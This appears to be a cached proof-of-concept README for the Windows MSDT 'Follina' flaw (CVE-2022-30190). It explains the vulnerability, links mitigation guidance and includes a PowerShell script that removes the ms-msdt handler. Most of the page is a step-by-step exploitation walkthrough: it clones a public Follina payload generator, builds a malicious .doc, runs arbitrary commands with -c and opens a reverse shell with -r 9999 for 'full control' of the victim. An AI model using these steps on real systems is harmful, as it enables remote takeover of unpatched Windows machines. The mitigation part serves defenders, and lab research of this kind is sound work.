POC details: c3c2212b66eea46a0a672ee41ec84f146be6375a

Source
Related vulnerability
Title: Microsoft Windows Support Diagnostic Tool OS Command Injection Vulnerability (CVE-2022-30190)
Description: Microsoft Windows Support Diagnostic Tool is a tool from Microsoft (USA) that collects information to send to Microsoft Support. The Microsoft Windows Support Diagnostic Tool (MSDT) contains an OS command injection vulnerability. The following products and versions are affected: Windows 10 Version 1809 for 32-bit Systems, Windows 10 Version 1809 for x64-based Systems, Windows
Description
CVE-2022-30190 Proof-Of-Concept
Introduction
## CVE?
CVE stands for Common Vulnerabilities and Exposures. In simple terms, it is the practice of assigning an identifier to each vulnerability or security issue found in a computer system or piece of software. Its main purpose is to give organizations and users a consistent reference for tracking and managing their vulnerabilities.

## CVE-2022-30190 _a.k.a_ "Follina"
The security vulnerability **CVE-2022-30190**, otherwise known as **"Follina"**, alarmed the cybersecurity community in 2022 because of how easily it could spread. It is a vulnerability in Microsoft Office products, Word in particular, that lets an attacker execute code remotely simply by tricking a user into opening a specially crafted document. It is especially dangerous because it does not depend on macros being enabled, which makes such an attack harder to block with traditional security measures.

Some sources about the discovery of CVE-2022-30190:
- [cve.org](https://www.cve.org/CVERecord?id=CVE-2022-30190)
- [nvd.gov](https://nvd.nist.gov/vuln/detail/cve-2022-30190)
- [Medium](https://medium.com/@ajithcrajendran/follina-msdt-cve-2022-30190-aab6575c8224)
- [Wikipedia](https://id.wikipedia.org/wiki/CVE-2022-30190)
- [HackTheBox](https://www.hackthebox.com/blog/cve-2022-30190-follina-explained)

## Mitigation for CVE-2022-30190
Keep your Microsoft Windows operating system up to date: turn on automatic updates so that security patches are installed as soon as they are released.

Some resources on how to mitigate CVE-2022-30190:
- [Microsoft Official Guidance](https://msrc.microsoft.com/blog/2022/05/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/)
- [SentinelOne](https://www.sentinelone.com/blog/staying-ahead-of-cve-2022-30190-follina/)
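Besides installing the update, the Microsoft guidance linked above describes a workaround for machines that cannot be patched immediately: back up and remove the `ms-msdt:` URL protocol handler so that Office can no longer hand a crafted `ms-msdt:` link to msdt.exe. The following PowerShell script is an added example (not part of this PoC repository) that applies that workaround, reports whether the handler is still present, and can restore it from the backup once the patch is installed; the `$BackupDir` path is an assumption you should adjust, and the script must run in an elevated session.

```powershell
# Added example: apply/verify/revert the Microsoft-published workaround for
# CVE-2022-30190 (remove the ms-msdt: protocol handler). Run as Administrator.
$HandlerKey = 'Registry::HKEY_CLASSES_ROOT\ms-msdt'
$BackupDir  = 'C:\Backup'   # assumption: choose a location you control

function Test-MsdtHandlerPresent {
    # True while the ms-msdt: protocol handler is still registered,
    # i.e. while the workaround has NOT been applied.
    return (Test-Path -Path $HandlerKey)
}

function Disable-MsdtHandler {
    if (-not (Test-MsdtHandlerPresent)) {
        Write-Output 'ms-msdt handler already absent; nothing to do.'
        return
    }
    New-Item -ItemType Directory -Path $BackupDir -Force | Out-Null
    $backupFile = Join-Path $BackupDir ('ms-msdt-{0:yyyyMMdd-HHmmss}.reg' -f (Get-Date))
    # Export first so the change can be reverted (reg.exe export ... /y overwrites).
    reg.exe export 'HKEY_CLASSES_ROOT\ms-msdt' $backupFile /y | Out-Null
    if ($LASTEXITCODE -ne 0) { throw 'Backup failed; handler left in place.' }
    Remove-Item -Path $HandlerKey -Recurse -Force
    Write-Output "Handler removed; backup saved to $backupFile"
}

function Restore-MsdtHandler {
    param([Parameter(Mandatory)][string]$BackupFile)
    # Re-import the exported key after the security update is installed.
    reg.exe import $BackupFile | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "Import of $BackupFile failed." }
    Write-Output 'ms-msdt handler restored.'
}

Disable-MsdtHandler
if (Test-MsdtHandlerPresent) {
    Write-Warning 'ms-msdt handler is still registered; workaround not applied.'
} else {
    Write-Output 'Workaround in place: ms-msdt handler is not registered.'
}
```

Removing the handler disables MSDT troubleshooters launched via `ms-msdt:` links, so keep the exported `.reg` file and run `Restore-MsdtHandler` once the update is installed.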

## Test Run on Virtual Machine
#### Tools and operating system used:
- Debian 12 as the attacker (host computer)
- Windows 10 build 19044.1288 (running in a VM) as the victim
- VirtualBox
#### Things that should be considered:
- The attacks in this experiment were performed only within the same local network
- The attack can be carried out over an outside network, but that requires some tinkering
- The attack in this test was carried out with the antivirus disabled on the victim's computer
- The attack only works on Microsoft Windows builds that are old or that have not received security patches since May 30, 2022, including Windows 10 and 11
#### Usage:
Update the attacker's computer (the host, which here runs Debian 12) with this command:
```
$ sudo apt update && sudo apt upgrade -y
```
Install Git if it is not already installed:
```
$ sudo apt install git
```
Install Python if it is not already installed:
```
$ sudo apt install python3
```
Install the "netifaces" module for Python 3:
```
$ sudo apt install python3-netifaces
```
Clone the payload repository created by [John Hammond](https://github.com/JohnHammond/) and change into its directory:
```
$ git clone https://github.com/JohnHammond/msdt-follina.git
$ cd msdt-follina
```
Run the payload script, then move the _**follina.doc**_ file located in the msdt-follina directory to the victim's computer:
```
$ python3 follina.py
```
Open the _**follina.doc**_ file on the victim's computer.
If the payload succeeds, the calculator application will open.

To execute other programs, use the `-c` option (here I'm using the notepad application as an example):
```
$ python3 follina.py -c "notepad.exe"
```

![Screenshot](https://github.com/madbaiu/CVE-2022-30190/blob/main/pic/Screenshot%20from%202024-11-25%2021-36-11.png?raw=true)

To use a reverse shell payload, simply run the following command:
```
$ python3 follina.py -r 9999
```
If the reverse shell payload succeeds, you land directly in a shell in the victim's computer directory, with full control over the victim's computer.

![Screenshot](https://github.com/madbaiu/CVE-2022-30190/blob/main/pic/Screenshot%20from%202024-11-25%2021-54-07.png?raw=true)

![Screenshot](https://github.com/madbaiu/CVE-2022-30190/blob/main/pic/Screenshot%20from%202024-11-25%2021-44-53.png?raw=true)

## Conclusions
As of July 22, 2022, this vulnerability has been patched by Microsoft, but that does not rule out its continuing to affect those who do not regularly update their Windows operating system. So do not forget to keep your operating system updated to stop cybercriminals in their tracks. Cheers!

File snapshot

```
[4.0K] /data/pocs/c3c2212b66eea46a0a672ee41ec84f146be6375a
├── [4.0K] msdt-follina
│   ├── [4.0K] doc
│   │   ├── [1.3K] [Content_Types].xml
│   │   ├── [4.0K] docProps
│   │   │   ├── [ 704] app.xml
│   │   │   └── [ 735] core.xml
│   │   └── [4.0K] word
│   │       ├── [3.8K] document.xml
│   │       ├── [1.5K] fontTable.xml
│   │       ├── [4.0K] _rels
│   │       │   └── [ 975] document.xml.rels
│   │       ├── [2.9K] settings.xml
│   │       ├── [ 29K] styles.xml
│   │       ├── [4.0K] theme
│   │       │   └── [6.6K] theme1.xml
│   │       └── [ 803] webSettings.xml
│   ├── [ 10K] follina.doc
│   ├── [5.0K] follina.py
│   ├── [ 44K] nc64.exe
│   └── [1.5K] README.md
├── [4.0K] pic
│   ├── [ 46K] Screenshot from 2024-11-25 21-36-11.png
│   ├── [ 44K] Screenshot from 2024-11-25 21-44-53.png
│   └── [ 97K] Screenshot from 2024-11-25 21-54-07.png
└── [4.4K] README.md

7 directories, 18 files
```
Cached for you by the Shenlong bot.
Notes
    1. We recommend accessing the PoC through the original source first.
    2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.